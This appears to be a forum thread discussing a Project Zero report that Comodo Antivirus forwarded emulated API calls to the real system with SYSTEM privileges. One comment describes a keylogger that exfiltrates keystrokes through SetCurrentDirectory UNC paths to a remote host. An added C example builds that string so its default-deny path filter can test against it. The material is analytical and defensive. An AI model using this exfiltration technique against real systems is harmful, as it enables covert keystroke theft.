Comodo Antivirus Forwards Emulated API Calls to the Real API During Scans

  • Google's Project Zero https://en.wikipedia.org/wiki/Project_Zero_(Google) is absolutely excellent! Google tasks top-notch engineers with finding zero-day bugs in other companies' products, making us all safer.

    Very big kudos to Google! The flood of bugs they keep finding and getting other companies to fix is fantastic!

  • When it comes to security research, Tavis Ormandy is truly inspirational. It isn't just about the bugs he discovers; I also find his explanations often very simple to understand.

    This is an extremely severe design issue, where an antivirus can not only be bypassed, but can actually be used to compromise an attacked system. Comodo runs suspicious code inside an emulator (VM), but instead of implementing full OS emulation, they allow a lot of the API calls inside the emulator to leak out to the hosting computer, and actually run them with NT AUTHORITY\SYSTEM privileges (the Windows equivalent of root).

    The exploit code serves as a simple key logger, by repeatedly calling GetKeyState() (with SYSTEM privileges!), and leaking this information to a remote server using the SetCurrentDirectory() API (by calling SetCurrentDirectory("\\\\?\\UNC\\192.168.237.1\\<Pressed key>")).

    This is a beautiful attack, and I couldn't help but smirk at the "wtf!!!!" comment.

  • Some previous Comodo issues:

    Comodo ships Adware Privdog worse than Superfish

    https://news.ycombinator.com/item?id=9091917

    Comodo “Chromodo” Browser disables same origin policy

    https://news.ycombinator.com/item?id=11021633

    Comodo Internet Security installs and starts a VNC server by default

    https://news.ycombinator.com/item?id=11129170

  • Actually, we find two issues here:

    1) that this huge attack surface existed in the first place. (almost by design)

    2) how they "fixed" it. (not questioning their design at all)

    The whole bugreport reads like an invitation to find more creative combinations of API calls that their filter forwards to the system. From the first comment:

    > They're planning to fix those two issues and review all the remaining API's for missing parameter filtering, but wanted to know if I agree that their design is sound. I said I suppose they're correct in theory, but this is a lot of attack surface [...]
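The "missing parameter filtering" quoted above, and the UNC-path exfiltration trick described in the GetKeyState/SetCurrentDirectory comment earlier in this thread, both come down to one decision: before an emulator forwards a guest's path argument to the host's real API, it has to decide whether that path can leave the local file system. The following is an added example written for this page, not Comodo's code and not Tavis Ormandy's exploit; the function and type names are invented, and the exfiltration string and host address are constructed from the comment above for the test.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Added example, not Comodo's filter: a default-deny check on the path
 * argument of a forwarded SetCurrentDirectory(). A UNC path makes the host
 * (running as SYSTEM) resolve a name and open an SMB connection, so the
 * filter must refuse anything outside the ordinary local namespace. */

typedef enum {
    FWD_ALLOW = 0,       /* plain local path, acceptable to forward */
    FWD_DENY_EMPTY,      /* empty argument */
    FWD_DENY_REMOTE,     /* \\host\share or \\?\UNC\host\share */
    FWD_DENY_DEVICE      /* \\.\ or \\?\ namespace: pipes, volumes, GLOBALROOT */
} fwd_verdict;

/* Win32 treats '/' like '\' when it normalizes a path, so "//host/share"
 * is still UNC; both characters count as separators here. */
static bool is_sep(char c) { return c == '\\' || c == '/'; }

/* Copy the host component (up to the next separator or end) into out. */
static void copy_host(const char *p, char *out, size_t outlen) {
    size_t i = 0;
    while (p[i] && !is_sep(p[i]) && i + 1 < outlen) { out[i] = p[i]; i++; }
    out[i] = '\0';
}

/* Classify a guest-supplied path. On FWD_DENY_REMOTE, host (if given)
 * receives the target host name so the sandbox can log what the guest
 * tried to contact; that string is the keystroke channel in the exploit. */
fwd_verdict classify_path_arg(const char *path, char *host, size_t hostlen) {
    if (host && hostlen) host[0] = '\0';
    if (!path || !path[0]) return FWD_DENY_EMPTY;

    /* Two leading separators means UNC, device namespace or verbatim prefix:
     * none of them is a plain local drive-letter path. */
    if (is_sep(path[0]) && is_sep(path[1])) {
        const char *rest = path + 2;

        /* Verbatim prefix "\\?\": normalization is off, and "\\?\UNC\host\..."
         * is the literal form used to reach the network in the attack. */
        if (rest[0] == '?' && is_sep(rest[1])) {
            const char *after = rest + 2;
            if ((after[0] == 'U' || after[0] == 'u') &&
                (after[1] == 'N' || after[1] == 'n') &&
                (after[2] == 'C' || after[2] == 'c') && is_sep(after[3])) {
                if (host) copy_host(after + 4, host, hostlen);
                return FWD_DENY_REMOTE;
            }
            /* \\?\C:\..., \\?\GLOBALROOT\..., \\?\Volume{...}: a sample under
             * emulation has no business in the verbatim namespace; deny. */
            return FWD_DENY_DEVICE;
        }
        /* "\\.\" device namespace: named pipes, physical drives, drivers. */
        if (rest[0] == '.' && is_sep(rest[1])) return FWD_DENY_DEVICE;

        /* Plain UNC "\\host\share" (or "//host/share" after normalization). */
        if (host) copy_host(rest, host, hostlen);
        return FWD_DENY_REMOTE;
    }
    /* A string check cannot tell a mapped network drive (Z:) from a local
     * one; that is why filtering is a stopgap and the SYSTEM-privileged
     * forwarding itself is the real problem. */
    return FWD_ALLOW;
}

/* The exfiltration string shape from the comment above: one call per key,
 * with the pressed key as the share name. Constructed for this example. */
int build_exfil_path(char *out, size_t outlen, const char *host, const char *key) {
    return snprintf(out, outlen, "\\\\?\\UNC\\%s\\%s", host, key);
}

int main(void) {
    char path[128], host[64];
    build_exfil_path(path, sizeof path, "192.168.237.1", "A");
    fwd_verdict v = classify_path_arg(path, host, sizeof host);
    printf("%s -> %s (host %s)\n", path,
           v == FWD_ALLOW ? "forward" : "deny", host);
    return 0;
}
```

The filter is deliberately coarse: every path that opens with two separators is refused, including `\\?\C:\...`, because a sample being scanned has no legitimate reason to use the verbatim or device namespaces, and a permissive rule would have to reason about `GLOBALROOT`, volume GUIDs and forward-slash variants. The mapped-drive comment is the caveat that matters: string filtering of one argument of one API cannot close the attack surface the quoted comment describes.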

  • My first thought is: so now I am relying on a company that basically provides me free services for security audits of other companies, some of which I pay for the services they deliver. (Last one is a stretch.) Of course, I rely on many free things, but it's the second-order aspect here that troubles me.

    Is there an indication of the complexity of the bugs they are finding? Are they among those that should be caught by QA?

  • Looking at this issue and the issues linked in its last comment...

    Why are they running things like unpackers and emulators as "NT AUTHORITY\SYSTEM", instead of farming them to less privileged processes?

  • Never trusted the sandbox functionality. I've been installing Comodo CIS with only the firewall and antivirus, sandboxing disabled, HIPS on at low settings. Any notable exploits left that would bypass that?

  • "used to forward", from what I understand this has been fixed.

  • My god what a mess. I think virus writers and hackers should specifically target anti virus suites, given how much of a security risk these pose to the user. Heh, I guess they do just that. I wouldn't be surprised if some of the virus and anti-virus writers are one and the same people or organizations. Because it makes a lot of sense - open the door to intruders and then tell users it's their fault, then manipulate them into buying your security product. Rinse and repeat and make millions.

  • Does anyone have any good experiences with any anti-virus software?